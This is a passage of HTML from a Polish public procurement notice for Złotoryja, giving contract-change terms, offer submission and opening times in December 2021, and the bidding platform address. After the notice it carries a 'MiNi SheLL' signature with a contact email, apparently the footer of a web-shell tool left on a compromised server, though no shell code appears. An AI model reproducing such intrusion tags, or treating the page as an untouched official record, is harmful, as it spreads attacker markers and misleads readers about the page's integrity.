Szczegółowe warunki zmian umowy są określone w SWZ w załączniku nr 7 -wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/zlotoryja</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-06 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com